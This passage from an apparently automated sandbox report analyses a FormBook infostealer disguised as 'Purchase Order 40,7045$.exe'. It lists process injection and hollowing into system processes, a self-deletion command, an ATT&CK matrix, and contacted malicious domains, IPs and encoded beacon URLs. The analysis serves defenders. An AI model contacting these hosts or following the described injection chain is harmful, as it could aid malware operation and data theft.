          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0486FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04818EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0488FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04808E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 204.188.203.155 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.161.26.87 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.201.11.126 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.127.175.50 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.194.171.26 80
          Source: C:\Windows\explorer.exeNetwork Connect: 13.224.93.48 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.155.168.14 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.71.133.130 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.95 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: CC0000
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000003.00000002.522024966.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000003.00000002.522729262.0000000001640000.00000002.00000001.sdmp, raserver.exe, 00000006.00000002.522695060.0000000003070000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeQueries volume information: C:\Users\user\Desktop\Purchase Order 40,7045$.exe VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321389 Sample: Purchase Order  40,7045$.exe Startdate: 21/11/2020 Architecture: WINDOWS Score: 100 36 g.msn.com 2->36 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 7 other signatures 2->46 11 Purchase Order  40,7045$.exe 3 2->11         started        signatures3 process4 file5 28 C:\Users\...\Purchase Order  40,7045$.exe.log, ASCII 11->28 dropped 14 MSBuild.exe 11->14         started        process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 2 other signatures 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 forbigdogs.com 81.169.145.95, 49757, 80 STRATOSTRATOAGDE Germany 17->30 32 www.lotoencasa.com 192.155.168.14, 49752, 80 PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL United States 17->32 34 21 other IPs or domains 17->34 38 System process connects to network (likely due to code injection or exploit) 17->38 21 raserver.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase Order 40,7045$.exe19%ReversingLabsWin32.Trojan.Wacatac
          Purchase Order 40,7045$.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.allan-wren.com/igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.justsoldbykristen.com/igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.thoughtslate.com/igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.ariasu-nakanokaikei.com/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.rockinglifefromhome.com/igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0100%Avira URL Cloudmalware
          http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0100%Avira URL Cloudmalware
          http://www.chemtradent.com/igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.theoutdoorbed.com/igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.pasumaisangam.com/igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.guidesgold.net/igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.erpsystem.site/igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sweetbasilmarketing.com/igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe
          http://www.lotoencasa.com/igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          theoutdoorbed.com
          		34.102.136.180
          		truetrue
            		unknown
            www.pasumaisangam.com
            		3.127.175.50
            		truetrue
              		unknown
              parking.namesilo.com
              		204.188.203.155
              		truefalse
                		high
                sweetbasilmarketing.com
                		185.201.11.126
                		truetrue
                  		unknown
                  parkingpage.namecheap.com
                  		198.54.117.211
                  		truefalse
                    		high
                    allmm.info
                    		34.102.136.180
                    		truetrue
                      		unknown
                      www.chemtradent.com
                      		45.194.171.26
                      		truetrue
                        		unknown
                        forbigdogs.com
                        		81.169.145.95
                        		truetrue
                          		unknown
                          www.justsoldbykristen.com
                          		52.71.133.130
                          		truetrue
                            		unknown
                            www.lotoencasa.com
                            		192.155.168.14
                            		truetrue
                              		unknown
                              www.ariasu-nakanokaikei.com
                              		13.224.93.48
                              		truetrue
                                		unknown
                                rockinglifefromhome.com
                                		34.102.136.180
                                		truetrue
                                  		unknown
                                  www.allan-wren.com
                                  		104.161.26.87
                                  		truetrue
                                    		unknown
                                    erpsystem.site
                                    		34.102.136.180
                                    		truetrue
                                      		unknown
                                      www.rockinglifefromhome.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.guidesgold.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.erpsystem.site
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.thoughtslate.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.allmm.info
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.indorebodybilaspur.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.forbigdogs.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    g.msn.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      www.theoutdoorbed.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.sweetbasilmarketing.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.allan-wren.com/igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.justsoldbykristen.com/igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.thoughtslate.com/igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ariasu-nakanokaikei.com/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.rockinglifefromhome.com/igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.chemtradent.com/igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.theoutdoorbed.com/igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.pasumaisangam.com/igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.guidesgold.net/igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.erpsystem.site/igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sweetbasilmarketing.com/igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.lotoencasa.com/igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0true
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.comexplorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.tiro.comexplorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.goodfont.co.krexplorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
